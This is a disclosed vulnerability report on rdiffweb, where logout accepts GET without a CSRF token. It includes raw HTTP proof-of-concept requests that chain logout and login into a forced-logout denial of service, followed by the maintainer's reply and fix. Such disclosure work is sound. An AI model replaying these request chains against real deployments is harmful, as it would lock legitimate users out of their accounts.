Lack of CSRF Token in Logout in ikus060/rdiffweb
Reported on
Dec 5th 2022
Description
we haven't csrf token in logout basically this is not really issue but in rdiffweb we have logically redirect user to last source like logout method. in this case attacker can chain two request(logout,login) that lead to dos
Proof of Concept
- send get logout request and get session_id
GET /logout HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session_id=475774603a53b2967f21e2be80de38d1e37babce
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
- send login request with previous session_id in response
POST /login/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Cookie: session_id=0fc203ce03dac2a8cc4dafc1852b920643aa8e85
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
login=admin&password=admin123&submit=Sign+in
response like that
HTTP/1.1 303 See Other
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.8.0
Date: Mon, 05 Dec 2022 06:40:58 GMT
X-Frame-Options: DENY
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: 0
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'
Location: http://127.0.0.1:8080/
Content-Language: en_US
Vary: Accept-Encoding
Content-Length: 90
Set-Cookie: session_id=4e13178447f685e835b6f9c78fdd203b32f8048a; HttpOnly; Path=/; SameSite=Lax
Connection: close
This resource can be found at <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>.
- login and logout unlimit
Impact
User never logged to rdiffweb
Prevention
Rate limiting: This involves limiting the number of requests that a user can make to your web application within a given time period. This can help to prevent DoS attacks by limiting the amount of traffic that an attacker can generate.
Captcha verification: This involves using a challenge-response test to verify that a user is a human and not a bot. This can help to prevent DoS attacks by blocking automated requests from bots.
Blacklisting: This involves maintaining a list of known attackers and blocking their requests. This can help to prevent DoS attacks by blocking requests from known attackers before they reach your web application.
Rate limiting is already in place.
Cross Site Request Forgery are in place and validate the origin on any POST request as recommended by OWASP
Blacklisting: As highlight in the documentation, for any serious installation of Rdiffweb it is expected to be behind a reverse proxy and possibly behind a WAF. Re-implementation of this technique to mitigate DoS is out of scope for Rdiffweb and any other Web application.
Hello,
Sure but in this case, we do have not any rate limit on the logout workflow but the attacker can redirect the user to logout then the user to login but logout automatically.
Regard
After verification, it seams a GET /logout is allowed. While I tought only POST /logout was accepted.
Will work on a fix.
@admin I cannot publish this vulnerability. It's failing with an error. Could you do it for me ?
This bug has now been fixed, I have gone ahead and published the vulnerability on your behalf, apologies for the inconvenience!